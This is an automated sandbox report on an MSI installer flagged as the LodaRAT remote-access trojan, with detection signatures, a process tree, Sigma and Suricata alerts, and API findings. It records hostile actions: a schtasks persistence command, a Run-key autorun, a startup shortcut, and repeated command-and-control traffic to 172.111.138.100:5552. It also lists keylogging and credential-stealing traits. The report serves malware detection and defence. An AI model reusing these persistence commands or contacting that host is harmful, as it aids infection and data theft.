Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.msi

Overview

General Information

Sample name:test.msi
Analysis ID:1582344
MD5:9e62c7a7caada70e0cd988510e2e0838
SHA1:3b2884a46ae25e424805879bd8f2e1e970c54272
SHA256:e397394a06441c8893d91907b6e7dd02bb1e5243d26697feb924b24bb2984647
Tags:knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

LodaRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
AI detected suspicious sample
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 4928 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\test.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3640 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSI77F6.tmp (PID: 3192 cmdline: "C:\Windows\Installer\MSI77F6.tmp" MD5: 13AF887E6C39E427715E769CC334C83E)
      • cmd.exe (PID: 6704 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2836 cmdline: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 2732 cmdline: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • ELJQZX.exe (PID: 6416 cmdline: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 6516 cmdline: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe" MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe" MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 1268 cmdline: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe" MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 6224 cmdline: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 3136 cmdline: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe MD5: 13AF887E6C39E427715E769CC334C83E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRATJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\PAITNR.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.3415165237.0000000003288000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        00000003.00000002.3418899166.0000000004D99000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          00000006.00000002.3414950251.00000000031D0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
            00000006.00000002.3415165237.00000000032B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
              Process Memory Space: MSI77F6.tmp PID: 3192JoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                Click to see the 3 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Potentially Suspicious Malware Callback Communication
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Windows\Installer\MSI77F6.tmp, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49762
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
                Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, ProcessId: 6704, ProcessName: cmd.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSI77F6.tmp, ProcessId: 3192, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PAITNR
                Sigma detected: Startup Folder File Write
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Installer\MSI77F6.tmp, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnk
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6704, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, ProcessId: 2836, ProcessName: schtasks.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:37:25.586902+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.649988TCP
                2024-12-30T11:38:03.633679+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.649988TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-30T11:36:12.325655+010028498851Malware Command and Control Activity Detected192.168.2.649762172.111.138.1005552TCP
                2024-12-30T11:36:12.325655+010028498851Malware Command and Control Activity Detected192.168.2.649885172.111.138.1005552TCP
                2024-12-30T11:36:12.325655+010028498851Malware Command and Control Activity Detected192.168.2.649986172.111.138.1005552TCP
                2024-12-30T11:36:12.325655+010028498851Malware Command and Control Activity Detected192.168.2.649949172.111.138.1005552TCP
                2024-12-30T11:36:12.325655+010028498851Malware Command and Control Activity Detected192.168.2.649988172.111.138.1005552TCP
                2024-12-30T11:36:12.325655+010028498851Malware Command and Control Activity Detected192.168.2.649826172.111.138.1005552TCP
                2024-12-30T11:36:28.508339+010028498851Malware Command and Control Activity Detected192.168.2.649762172.111.138.1005552TCP
                2024-12-30T11:36:37.554770+010028498851Malware Command and Control Activity Detected192.168.2.649826172.111.138.1005552TCP
                2024-12-30T11:36:46.800558+010028498851Malware Command and Control Activity Detected192.168.2.649885172.111.138.1005552TCP
                2024-12-30T11:36:55.862538+010028498851Malware Command and Control Activity Detected192.168.2.649949172.111.138.1005552TCP
                2024-12-30T11:37:04.956730+010028498851Malware Command and Control Activity Detected192.168.2.649986172.111.138.1005552TCP
                2024-12-30T11:37:14.034642+010028498851Malware Command and Control Activity Detected192.168.2.649988172.111.138.1005552TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeVirustotal: Detection: 52%Perma Link
                Source: C:\Windows\Installer\MSI77F6.tmpReversingLabs: Detection: 87%
                Source: C:\Windows\Installer\MSI77F6.tmpVirustotal: Detection: 52%Perma Link
                Multi AV Scanner detection for submitted file
                Source: test.msiReversingLabs: Detection: 57%
                Source: test.msiVirustotal: Detection: 61%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.3% probability
                Machine Learning detection for dropped file
                Source: C:\Windows\Installer\MSI77F6.tmpJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeFile opened: c:Jump to behavior
                Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_0078DD92 GetFileAttributesW,FindFirstFileW,FindClose,3_2_0078DD92
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C2044
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C219F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007C24A9
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_007B6B3F
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_007B6E4A
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007BF350
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BFD47 FindFirstFileW,FindClose,3_2_007BFD47
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_007BFDD2
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D2044
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D219F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002D24A9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_002C6B3F
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_002C6E4A
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002CF350
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CFD47 FindFirstFileW,FindClose,8_2_002CFD47
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_0029DD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_0029DD92
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_002CFDD2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49826 -> 172.111.138.100:5552
                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49762 -> 172.111.138.100:5552
                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49885 -> 172.111.138.100:5552
                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49949 -> 172.111.138.100:5552
                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49988 -> 172.111.138.100:5552
                Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49986 -> 172.111.138.100:5552
                Source: Network trafficSuricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.6:49988
                Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_007C550C
                Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/6;
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_007C7099
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_007C7294
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exeCode function: 8_2_002D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_002D7294
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_007C7099
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007B4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_007B4342
                Source: C:\Windows\Installer\MSI77F6.tmpCode function: 3_2_007DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_007DF5D0
